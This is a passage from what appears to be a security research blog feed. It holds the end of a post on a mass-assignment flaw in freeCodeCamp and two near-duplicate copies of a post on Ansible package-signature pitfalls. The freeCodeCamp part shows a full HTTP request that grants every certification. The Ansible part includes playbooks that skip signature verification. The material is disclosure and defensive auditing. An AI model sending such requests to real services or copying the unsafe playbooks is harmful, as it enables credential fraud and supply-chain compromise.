Acquiring All Certifications on freeCodeCamp

The next step was to ensure that this function could be reached from a public-facing route within the application, and it turned out to be as simple as a PUT call to /update-user-flag, a route originally added so that users could change their theme on the site.

I created an account on freeCodeCamp’s dev environment, and also looked at the user model in the codebase to find what attributes I could maliciously modify. Although freeCodeCamp did not have roles or administrative users, all the certificate information was stored in the user model.

Therefore, the exploit simply involved making the following request:

PUT /update-user-flag HTTP/2
Host: api.freecodecamp.dev
Cookie: _csrf=lsCzfu4[...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.freecodecamp.dev/
Csrf-Token: Tu0VHrwW-GJvZ4ly1sVEXjHxSzgPLLj99OLQ
Content-Type: application/json
Origin: https://www.freecodecamp.dev
Content-Length: 518
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

{
  "name": "Mass Assignment",
  "isCheater": false,
  "isHonest": true,
  "isInfosecCertV7":true,
  "isApisMicroservicesCert":true,
  "isBackEndCert":true,
  "is2018DataVisCert":true,
  "isDataVisCert":true,
  "isFrontEndCert":true,
  "isFullStackCert":true,
  "isFrontEndLibsCert":true,
  "isInfosecQaCert":true,
  "isQaCertV7":true,
  "isInfosecCertV7":true,
  "isJsAlgoDataStructCert":true,
  "isRelationalDatabaseCertV8":true,
  "isRespWebDesignCert":true,
  "isSciCompPyCertV7":true,
  "isDataAnalysisPyCertV7":true,
  "isMachineLearningPyCertV7":true
}

After sending the request, a bunch of signed certifications showed up on my profile, each one supposedly requiring 300 hours of work.

Some aspiring developers use freeCodeCamp certifications as evidence of their coding skills and education, so anything that calls into question the integrity of those certifications is bad for the platform. There are certainly other ways to cheat, but those require more effort than sending a single request.

I reported this to freeCodeCamp, and they promptly fixed the vulnerability and released a GitHub security advisory.

Conclusion

Overall, it turned out that a third-party service, grep.app, is much better than both GitHub’s old and new search for querying across a large number of popular GitHub projects. The fact that we were able to use it to so quickly discover a vuln in a top repository suggests there’s a lot more good stuff to find. The key was to be highly selective so as to not get overwhelmed by results.

I expect that GitHub CodeSearch will continue to improve, and hope they will offer a “stars” qualifier by the time the feature reaches general availability.

The post Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app appeared first on Include Security Research Blog.

Hack Series: Is your Ansible Package Configuration Secure?

In our client assessment work hacking software and cloud systems of all types, we’re often asked to look into configuration management tools such as Ansible. In this post we’ll deep dive into what package management vulnerabilities in the world of Ansible look like. First we’ll recap what Ansible is, provide some tips for security pros to debug it at a lower level, and explore both a CVE in the dnf module and an interesting gotcha in the apt module.

To ensure we’re always looking out for DevSecOps and aiding defenders, our next post in this series will touch on the strengths and weaknesses of tools like Semgrep for catching vulnerabilities in Ansible configurations.

Ansible

Ansible is an open source, Python-based, configuration management tool developed by Red Hat. It enables DevOps and other system maintainers to easily write automation playbooks, composed of a series of tasks in YAML format, and then run those playbooks against targeted hosts.

A key feature of Ansible is that it is agentless: the targeted hosts don’t need to have Ansible installed, just Python and SSH. The machine running the playbook (“control node” in Ansible speak) copies the Python code required to run the tasks to the targeted hosts (“managed nodes”) over SSH, and then executes that code remotely. Managed nodes are organized into groups in an “inventory” for easy targeting by playbooks.

Credit: codingpackets.com

In 2019 Ansible was the most popular cloud configuration management tool. While the paradigm of “immutable infrastructure” has led to more enthusiasm for choosing Terraform and Docker for performing several tasks that previously might have been done by Ansible, it is still an immensely popular tool for provisioning resources, services, and applications.

Ansible provides a large number of built-in modules, which are essentially high-level interfaces for calling common system commands like apt, yum, or sysctl. The modules are Python files that do the work of translating the specified YAML tasks into the commands that actually get executed on the managed nodes. For example, the following playbook contains a single Ansible task which uses the apt module to install NGINX on a Debian-based system. Normally an Ansible playbook would be run against a remote host, but in our examples we are targeting localhost for illustrative purposes:

- name: Sample Apt Module Playbook
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx
        state: present

To understand better what this playbook is doing under the hood, let’s use a debugging technique that will come in useful when we look at vulnerabilities later. Since Ansible doesn’t natively provide a way to see the exact commands getting run, we can use a handy strace invocation. strace allows us to follow the flow of system calls that this playbook triggers when run normally under ansible-playbook, even as Ansible forks off multiple child processes (“-f” flag), so we can view the command that ultimately gets executed:

$ sudo strace -f -e trace=execve ansible-playbook playbook.yml 2>&1 | grep apt
[pid 11377] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "install", "nginx"], 0x195b3e0 /* 33 vars */) = 0

Using both strace command line options (“-e trace=execve”) and grep as filters, we make sure that irrelevant system calls are not output to the terminal; this avoids the noise of all the setup code that both Ansible and the apt module need to run before finally fulfilling the task. Ultimately we can see that the playbook runs the command apt-get install nginx, with a few extra command line flags to automate accepting confirmation prompts and interactive dialogues.
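When many tasks are traced at once, it can help to turn each execve line back into a plain argument list. The following is a minimal sketch of that idea, not part of Ansible or strace; the names EXECVE_RE and parse_execve are hypothetical, and it assumes the arguments are simple quoted strings that strace has not truncated or escaped:

```python
import json
import re

# Matches the execve(...) part of an `strace -f -e trace=execve` line and
# captures the program path and the raw argv list between the brackets.
EXECVE_RE = re.compile(r'execve\("(?P<path>[^"]+)", \[(?P<argv>.*)\], ')


def parse_execve(line):
    """Return (path, argv) for an strace execve line, or None if it does not parse."""
    match = EXECVE_RE.search(line)
    if match is None:
        return None
    # Assumption: every argument is a simple double-quoted string, so the list
    # can be read as a JSON array. C-style escapes or truncated arguments in
    # the strace output would make this fail, in which case None is returned.
    try:
        argv = json.loads("[" + match.group("argv") + "]")
    except json.JSONDecodeError:
        return None
    return match.group("path"), argv


sample = (
    '[pid 11377] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", '
    '"Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", '
    '"install", "nginx"], 0x195b3e0 /* 33 vars */) = 0'
)

path, argv = parse_execve(sample)
print(path)
print(" ".join(argv[1:]))
```

Feeding it the sample line from the trace above yields the program path and the arguments that follow it, which is easier to compare across playbook runs than the raw strace text.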

If you are following along and don’t see the apt-get install command in the strace output, make sure NGINX is uninstalled first. To improve performance and prevent unwanted side-effects, Ansible first checks whether a task has already been achieved, and so returns early with an “ok” status if it thinks NGINX is already in the installed state.

Top 10 Tips for Ansible Security Audits

As shown, Ansible transforms tasks declared in simple YAML format into system commands often run as root on the managed nodes. This layer of abstraction can easily turn into a mismatch between what a task appears to do and what actually happens under the hood. We will explore where such mismatches in Ansible’s built-in modules make it possible to create configuration vulnerabilities across all managed nodes.

But first, let’s take a step back and contextualize this by running through general tips if you are auditing an Ansible-managed infrastructure. From an infrastructure security perspective, Ansible does not expose as much attack surface as some other configuration management tools. SSH is the default transport used to connect from the control node to the managed nodes, so Ansible traffic takes advantage of the sane defaults, cryptography, and integration with Linux servers that the OpenSSH server offers. However, Ansible can be deployed in many ways, and best practices may be missed when writing roles and playbooks. Here are IncludeSec’s top 10 Ansible security checks to remember when reviewing a configuration:

  1. Is an old version of Ansible being used which is vulnerable to known CVEs?
  2. Are hardcoded secrets checked into YAML files?
  3. Are managed nodes in different environments (production, development, staging) not appropriately separated into inventories?
  4. Are the control nodes which Ansible is running from completely locked down with host/OS based security controls?
  5. Are unsafe lookups which facilitate template injection enabled?
  6. Are SSHD config files using unrecommended settings like permitting root login or enabling remote port forwarding?
  7. Are alternative connection methods being used (such as ansible-pull) and are they being appropriately secured?
  8. Are the outputs of playbook runs being logged or audited by default?
  9. Is the confidential output of privileged tasks being logged?
  10. Are high-impact roles/tasks (e.g. those that are managing authentication, or installing packages) actually doing what they appear to be?

Whether those tips apply will obviously vary depending on whether the organization is managing Ansible behind a tool like Ansible Tower, or if it’s a startup where all developers have SSH access to production. However, one thing that remains constant is that Ansible is typically used to install packages to set up managed nodes, so configuration vulnerabilities in package management tasks are of particular interest. We will focus on cases where declaring common package management operations in Ansible YAML format can have unintended security consequences.

CVE-2020-14365: Package Signature Ignored in dnf Module

The most obvious type of mismatch between YAML abstraction and reality in an Ansible module would be an outright bug. A recent example of this is CVE-2020-14365. The dnf module installs packages using the dnf package manager, the successor of yum and the default on Fedora Linux. The bug was that the module didn’t perform signature verification on packages it downloaded. Here is an example of a vulnerable task when run on Ansible versions <2.8.15 and <2.9.13:

- name: The task in this playbook was vulnerable to CVE-2020-14365
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      dnf:
        name: nginx
        state: present
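For the first audit tip (known-vulnerable versions), the version bounds quoted above can be turned into a quick check. This is a rough sketch that reads the two bounds literally; the function names are hypothetical, and it assumes plain numeric release strings such as 2.9.12 (pre-release suffixes are not handled):

```python
def parse_version(text):
    """Turn a release string such as '2.9.12' into a 3-part tuple of integers."""
    parts = tuple(int(part) for part in text.split("."))
    # Pad short versions like '2.9' so that tuple comparisons behave as expected.
    return parts + (0,) * (3 - len(parts))


def dnf_module_affected(version_text):
    """Return True if the version falls in the ranges quoted for CVE-2020-14365.

    Assumption: '<2.8.15 and <2.9.13' is read as 'anything before 2.8.15,
    plus the 2.9 series before 2.9.13'.
    """
    version = parse_version(version_text)
    return version < (2, 8, 15) or (2, 9, 0) <= version < (2, 9, 13)


for candidate in ("2.8.14", "2.8.15", "2.9.12", "2.9.13", "2.10.0"):
    print(candidate, dnf_module_affected(candidate))
```

The version string itself would come from running ansible --version on the control node; the check is only as accurate as the ranges fed into it.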

The vulnerability is severe when targeted by advanced attackers, because it provides an opening for a supply-chain attack. The lack of signature verification makes it possible for both the package mirror and man-in-the-middle (MITM) attackers on the network in between to supply their own packages which execute arbitrary commands as root on the host during installation.

For more details about how to perform such an attack, this guide walks through injecting backdoored apt packages from a MITM perspective. The scenario was presented a few years ago on a HackTheBox machine.

The issue is exacerbated by the fact that in most cases on Linux distros, GPG package signatures are the only thing giving authenticity and integrity to the downloaded packages. Package mirrors, including those used by dnf, don’t widely use HTTPS (see Why APT does not use HTTPS for the justification). With HTTPS transport between mirror and host, the CVE is still exploitable by a malicious mirror but at least the MITM attacks are a lot harder to pull off. We ran a quick test and despite Fedora using more HTTPS mirrors than Debian, some default mirrors selected due to geographical proximity were HTTP-only.

The root cause of the CVE was that the Ansible dnf module imported a Python module as an interface for handling dnf operations, but did not call a crucial _sig_check_pkg() function. Presumably, this check was either forgotten or assumed to be performed automatically in the imported module.

Package Signature Checks Can be Bypassed When Downgrading Package Versions

The dnf example was clearly a bug, now patched, so let’s move on to a more subtle type of mismatch where the YAML interface doesn’t map cleanly to the desired low-level behavior. This time it is in the apt package manager module and is a mistake we have seen in several production Ansible playbooks.

In a large infrastructure, it is common to install packages from multiple sources, from a mixture of official distro repositories, third-party repositories, and in-house repositories. Sometimes the latest version of a package will cause dependency problems or remove features which are relied upon. The solution which busy teams often choose is to downgrade the package to the last version that was working. While downgrades should never be a long-term solution, they can be necessary when the latest version is actively breaking production or a package update contains a bug.

When run interactively from the command line, apt install (and apt-get install, they are identical for our purposes) allows you to specify an older version you want to downgrade to, and it will do the job. But when accepting confirmation prompts automatically (in “-y” mode, which Ansible uses), apt will error out unless the --allow-downgrades argument is explicitly specified. Further confirmation is required since a downgrade may break other packages. But the Ansible apt module doesn’t offer an equivalent of the --allow-downgrades option; there’s no clear way to make a downgrade work using Ansible.

The first Stack Overflow answer that comes up when searching for “ansible downgrade package” recommends using force: true (or force: yes which is equivalent in YAML):

- name: Downgrade NGINX in a way that is vulnerable
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx=1.14.0-0ubuntu1.2
        force: true
        state: present

This works fine, and without follow-up, this pattern can become a fixture of the configuration which an organization runs regularly across hosts. Unfortunately, it creates a vulnerability similar to the dnf CVE, disabling signature verification.

To look into what is going on, let’s use the strace command line to see the full invocation:

$ sudo strace -f -e trace=execve ansible-playbook apt_force_true.yml 2>&1 | grep apt
[pid 479683] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "--force-yes", "install", "nginx=1.14.0-0ubuntu1.2"], 0x1209b40 /* 33 vars */) = 0

The force: true option has added the --force-yes parameter (as stated in the apt module docs). --force-yes is a blunt hammer that will ignore any problems with the installation, including a bad signature on the downloaded package. If this same apt-get install command is run manually from the command line, it will warn: --force-yes is deprecated, use one of the options starting with --allow instead. And to Ansible’s credit, it also warns in the docs that force “is a destructive operation with the potential to destroy your system, and it should almost never be used.”
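Once the argument list is known, checking it for flags that relax apt-get’s safety checks is mechanical. The snippet below is a small illustration only; RISKY_APT_ARGS and risky_apt_args are hypothetical names, and the set of flags is an assumption that covers --force-yes plus the related apt-get option --allow-unauthenticated rather than an exhaustive list:

```python
# Arguments that relax or disable apt-get's safety checks. --force-yes is the
# flag discussed above; --allow-unauthenticated is a related apt-get option.
# Assumption: this set is illustrative, not exhaustive.
RISKY_APT_ARGS = {"--force-yes", "--allow-unauthenticated"}


def risky_apt_args(argv):
    """Return the risky arguments found in an apt-get argv list, in order."""
    if not argv or not argv[0].endswith("apt-get"):
        return []
    return [arg for arg in argv[1:] if arg in RISKY_APT_ARGS]


# The argument list from the strace output of the force: true playbook.
forced = [
    "/usr/bin/apt-get", "-y",
    "-o", "Dpkg::Options::=--force-confdef",
    "-o", "Dpkg::Options::=--force-confold",
    "--force-yes", "install", "nginx=1.14.0-0ubuntu1.2",
]
print(risky_apt_args(forced))
```

Run against the argument list of the plain install task shown earlier, the same function returns an empty list.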

So why is use of force: true so prevalent across Ansible deployments we have seen? It’s because there’s no easy alternative for this common downgrade use-case. There are only unpleasant workarounds: running the full apt install command line using the command or shell modules, and then using either Apt Pinning or dpkg holding, native methods in Debian-derived distros, to hold the package at the previous version.
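Given how common the pattern is, a quick text scan of playbooks can surface it during an audit. The following is a heuristic sketch under stated assumptions, not a YAML parser: it only recognizes the block style used in the examples here (an apt: key on its own line with indented arguments below it), and the name find_forced_apt_tasks is hypothetical:

```python
import re

# An `apt:` (or `ansible.builtin.apt:`) key on its own line, optionally
# starting a list item.
APT_KEY_RE = re.compile(r"^\s*(?:-\s+)?(?:ansible\.builtin\.)?apt:\s*$")
# A `force:` argument set to a truthy YAML value.
FORCE_RE = re.compile(r"^\s*force:\s*(?:true|yes)\s*(?:#.*)?$", re.IGNORECASE)


def find_forced_apt_tasks(playbook_text):
    """Return 1-based line numbers of `force: true` inside apt module blocks."""
    findings = []
    apt_indent = None  # indentation of the current `apt:` key, if inside one
    for lineno, line in enumerate(playbook_text.splitlines(), start=1):
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        if APT_KEY_RE.match(line):
            apt_indent = indent
            continue
        if apt_indent is not None:
            if indent <= apt_indent:
                apt_indent = None  # left the apt module's argument block
            elif FORCE_RE.match(line):
                findings.append(lineno)
    return findings


playbook = """\
- name: Downgrade NGINX in a way that is vulnerable
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx=1.14.0-0ubuntu1.2
        force: true
        state: present
"""
print(find_forced_apt_tasks(playbook))
```

A line-based check like this misses inline forms such as apt: name=nginx force=yes and templated values, so it is best treated as a first pass rather than a replacement for proper static analysis.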

On the Ansible issue tracker, people have been asking for years for an allow_downgrade option for the apt module, but two separate pull requests have been stuck in limbo because they do not meet the needs of the project. Ansible requires integration tests for every feature, and they are difficult to provide for this functionality since Debian-derived distros don’t normally host older versions of packages in their default repositories to downgrade to. The yum and dnf modules have had an allow_downgrade option since 2018.

Fixing the Problem

At IncludeSec we like to contribute to open source where we can, so we’ve opened a pull request to resolve this shortcoming of the apt module. This time, the change has integration tests and will hopefully meet the requirements of the project and get merged!

(Update: Our PR was accepted, and the resulting allow_downgrade option is usable as of Ansible Core version 2.12.)

The next part of this series will explore using Semgrep to identify this vulnerability and others in Ansible playbooks. We’ll review the top 10 Ansible security audit checks presented and see how much of the hard work can be automated through static analysis. We’ve got a lot more to say about this, so stay tuned for our next post on the topic!

The post Hack Series: Is your Ansible Package Configuration Secure? appeared first on Include Security Research Blog.

Hack Series: Is your Ansible Package Configuration Secure?

In our client assessment work hacking software and cloud systems of all types, we’re often asked to look into configuration management tools such as Ansible. In this post we’ll deep dive into what package management vulnerabilities in the world of Ansible look like. First we’ll recap what Ansible is, provide some tips for security pros to debug it at a lower level, and explore both a CVE in the dnf module and an interesting gotcha in the apt module.

To ensure we’re always looking out for DevSecOps and aiding defenders, our next post in this series will touch on the strengths and weaknesses of tools like Semgrep for catching vulnerabilities in Ansible configurations.

Ansible

Ansible is an open source, Python-based, configuration management tool developed by Red Hat. It enables DevOps and other system maintainers to easily write automation playbooks, composed of a series of tasks in YAML format, and then run those playbooks against targeted hosts. A key feature of Ansible is that it is agentless: the targeted hosts don’t need to have Ansible installed, just Python and SSH. The machine running the playbook (“control node” in Ansible speak) copies the Python code required to run the tasks to the targeted hosts (“managed nodes”) over SSH, and then executes that code remotely. Managed nodes are organized into groups in an “inventory” for easy targeting by playbooks.

Credit: codingpackets.com

In 2019 Ansible was the most popular cloud configuration management tool. While the paradigm of “immutable infrastructure” has led to more enthusiasm for choosing Terraform and Docker for performing several tasks that previously might have been done by Ansible, it is still an immensely popular tool for provisioning resources, services, and applications.

Ansible provides a large number of built-in modules, which are essentially high-level interfaces for calling common system commands like apt, yum, or sysctl. The modules are Python files that do the work of translating the specified YAML tasks into the commands that actually get executed on the managed nodes. For example, the following playbook contains a single Ansible task which uses the apt module to install NGINX on a Debian-based system. Normally an Ansible playbook would be run against a remote host, but in our examples we are targeting localhost for illustrative purposes:

- name: Sample Apt Module Playbook
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx
        state: present

To understand better what this playbook is doing under the hood, let’s use a debugging technique that will come in useful when we look at vulnerabilities later. Since Ansible doesn’t natively provide a way to see the exact commands getting run, we can use a handy strace invocation. strace allows us to follow the flow of system calls that this playbook triggers when run normally under ansible-playbook, even as Ansible forks off multiple child processes (“-f” flag), so we can view the command that ultimately gets executed:

$ sudo strace -f -e trace=execve ansible-playbook playbook.yml 2>&1 | grep apt
[pid 11377] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "install", "nginx"], 0x195b3e0 /* 33 vars */) = 0

Using both strace command line options (“-e trace=execve”) and grep as filters, we make sure that irrelevant system calls are not output to the terminal; this avoids the noise of all the setup code that both Ansible and the apt module need to run before finally fulfilling the task. Ultimately we can see that the playbook runs the command apt-get install nginx, with a few extra command line flags to automate accepting confirmation prompts and interactive dialogues.

If you are following along and don’t see the apt-get install command in the strace output, make sure NGINX is uninstalled first. To improve performance and prevent unwanted side-effects, Ansible first checks whether a task has already been achieved, and so returns early with an “ok” status if it thinks NGINX is already in the installed state.

Top 10 Tips for Ansible Security Audits

As shown, Ansible transforms tasks declared in simple YAML format into system commands often run as root on the managed nodes. This layer of abstraction can easily turn into a mismatch between what a task appears to do and what actually happens under the hood. We will explore where such mismatches in Ansible’s built-in modules make it possible to create configuration vulnerabilities across all managed nodes.

But first, let’s take a step back and contextualize this by running through general tips if you are auditing an Ansible-managed infrastructure. From an infrastructure security perspective, Ansible does not expose as much attack surface as some other configuration management tools. SSH is the default transport used to connect from the control node to the managed nodes, so Ansible traffic takes advantage of the sane defaults, cryptography, and integration with Linux servers that the OpenSSH server offers. However, Ansible can be deployed in many ways, and best practices may be missed when writing roles and playbooks. Here are IncludeSec’s top 10 Ansible security checks to remember when reviewing a configuration:

  1. Is an old version of Ansible being used which is vulnerable to known CVEs?
  2. Are hardcoded secrets checked into YAML files?
  3. Are managed nodes in different environments (production, development, staging) not appropriately separated into inventories?
  4. Are the control nodes which Ansible is running from not completely locked down?
  5. Are unsafe lookups which facilitate template injection enabled?
  6. Are SSHD config files using unrecommended settings like permitting root login or enabling remote port forwarding?
  7. Are alternative connection methods being used (such as ansible-pull) and are they being appropriately secured?
  8. Is the output of playbook runs not being logged or audited by default?
  9. Is the confidential output of privileged tasks being logged?
  10. Are high-impact roles/tasks (e.g. those that are managing authentication, or installing packages) actually doing what they appear to be?

Whether those tips apply will obviously vary depending on whether the organization is managing Ansible behind a tool like Ansible Tower, or if it’s a startup where all developers have SSH access to production. However, one thing that remains constant is that Ansible is typically used to install packages to set up managed nodes, so configuration vulnerabilities in package management tasks are of particular interest. We will focus on cases where declaring common package management operations in Ansible YAML format can have unintended security consequences.

CVE-2020-14365: Package Signature Ignored in dnf Module

The most obvious type of mismatch between YAML abstraction and reality in an Ansible module would be an outright bug. A recent example of this is CVE-2020-14365. The dnf module installs packages using the dnf package manager, the successor of yum and the default on Fedora Linux. The bug was that the module didn’t perform signature verification on packages it downloaded. Here is an example of a vulnerable task when run on Ansible versions <2.8.15 and <2.9.13:

- name: The task in this playbook was vulnerable to CVE-2020-14365
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      dnf:
        name: nginx
        state: present

The vulnerability is severe when targeted by advanced attackers, because it provides an opening for a supply-chain attack. The lack of signature verification makes it possible for both the package mirror and man-in-the-middle (MITM) attackers on the network in between to supply their own packages which execute arbitrary commands as root on the host during installation.

For more details about how to perform such an attack, this guide walks through injecting backdoored apt packages from a MITM perspective. The scenario was presented a few years ago on a HackTheBox machine.

The issue is exacerbated by the fact that in most cases on Linux distros, GPG package signatures are the only thing giving authenticity and integrity to the downloaded packages. Package mirrors, including those used by dnf, don’t widely use HTTPS (see Why APT does not use HTTPS for the justification). With HTTPS transport between mirror and host, the CVE is still exploitable by a malicious mirror but at least the MITM attacks are a lot harder to pull off. We ran a quick test and despite Fedora using more HTTPS mirrors than Debian, some default mirrors selected due to geographical proximity were HTTP-only.

The root cause of the CVE was that the Ansible dnf module imported a Python module as an interface for handling dnf operations, but did not call a crucial _sig_check_pkg() function. Presumably, this check was either forgotten or assumed to be performed automatically in the imported module.

Package Signature Checks Can be Bypassed When Downgrading Package Versions

The dnf example was clearly a bug, now patched, so let’s move on to a more subtle type of mismatch where the YAML interface doesn’t map cleanly to the desired low-level behavior. This time it is in the apt package manager module and is a mistake we have seen in several production Ansible playbooks.

In a large infrastructure, it is common to install packages from multiple sources, from a mixture of official distro repositories, third-party repositories, and in-house repositories. Sometimes the latest version of a package will cause dependency problems or remove features which are relied upon. The solution which busy teams often choose is to downgrade the package to the last version that was working. While downgrades should never be a long-term solution, they can be necessary when the latest version is actively breaking production or a package update contains a bug.

When run interactively from the command line, apt install (and apt-get install, they are identical for our purposes) allows you to specify an older version you want to downgrade to, and it will do the job. But when accepting confirmation prompts automatically (in “-y” mode, which Ansible uses), apt will error out unless the --allow-downgrades argument is explicitly specified. Further confirmation is required since a downgrade may break other packages. But the Ansible apt module doesn’t offer an equivalent of the --allow-downgrades option; there’s no clear way to make a downgrade work using Ansible.

The first Stack Overflow answer that comes up when searching for “ansible downgrade package” recommends using force: true (or force: yes which is equivalent in YAML):

- name: Downgrade NGINX in a way that is vulnerable
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is installed
      apt:
        name: nginx=1.14.0-0ubuntu1.2
        force: true
        state: present

This works fine, and without follow-up, this pattern can become a fixture of the configuration which an organization runs regularly across hosts. Unfortunately, it creates a vulnerability similar to the dnf CVE, disabling signature verification.

To look into what is going on, let’s use the strace command line to see the full invocation:

$ sudo strace -f -e trace=execve ansible-playbook apt_force_true.yml 2>&1 | grep apt
[pid 479683] execve("/usr/bin/apt-get", ["/usr/bin/apt-get", "-y", "-o", "Dpkg::Options::=--force-confdef", "-o", "Dpkg::Options::=--force-confold", "--force-yes", "install", "nginx=1.14.0-0ubuntu1.2"], 0x1209b40 /* 33 vars */) = 0

The force: true option has added the --force-yes parameter (as stated in the apt module docs). --force-yes is a blunt hammer that will ignore any problems with the installation, including a bad signature on the downloaded package. If this same apt-get install command is run manually from the command line, it will warn: --force-yes is deprecated, use one of the options starting with --allow instead. And to Ansible’s credit, it also warns in the docs that force “is a destructive operation with the potential to destroy your system, and it should almost never be used.”

So why is use of force: true so prevalent across Ansible deployments we have seen? It’s because there’s no alternative for this common downgrade use-case besides running the full apt install command line using the command or shell modules, which is stylistically the opposite of what Ansible is all about.

On the Ansible issue tracker, people have been asking for years for an allow_downgrade option for the apt module, but two separate pull requests have been stuck in limbo because they do not meet the needs of the project. Ansible requires integration tests for every feature, and they are difficult to provide for this functionality since Debian-derived distros don’t normally host older versions of packages in their default repositories to downgrade to. The yum and dnf modules have had an allow_downgrade option since 2018.

Fixing the Problem

At IncludeSec we like to contribute to open source where we can, so we’ve opened a pull request to resolve this shortcoming of the apt module, by adding an allow_downgrade option. This time, the change has integration tests and will hopefully meet the requirements of the project and get merged!

In the meantime, how can you safely drop back to an old version of a package in an Ansible-managed infrastructure? First, run a one-time apt install command with the --allow-downgrades option. Next, prevent subsequent upgrades of the package using either Apt Pinning or dpkg holding, native methods in Debian-derived distros to do this. The hold can be performed by Ansible with the dpkg_selections module:

- name: Downgrade and Hold a Package
  hosts: localhost
  become: yes
  become_user: root
  tasks:
    - name: ensure nginx is downgraded
      command:
        cmd: "apt install -y -o Dpkg::Options::=--force-confold -o Dpkg::Options::=--force-confdef --allow-downgrades nginx=1.16.0-1~buster"
    - name: ensure nginx is held back
      dpkg_selections:
        name: nginx
        selection: hold

Overall the approach is neither obvious nor pretty, and it is therefore a perfect example of a mismatch between the YAML abstraction, which appears to just force a downgrade, and the reality, which is that it forces ignoring signature verification errors too. We hope this will change soon.

The next part of this series will explore using Semgrep to identify this vulnerability and others in Ansible playbooks. We’ll review the top 10 Ansible security audit checks presented and see how much of the hard work can be automated through static analysis. We’ve got a lot more to say about this, so stay tuned for our next post on the topic!

The post Hack Series: Is your Ansible Package Configuration Secure? appeared first on Include Security Research Blog.
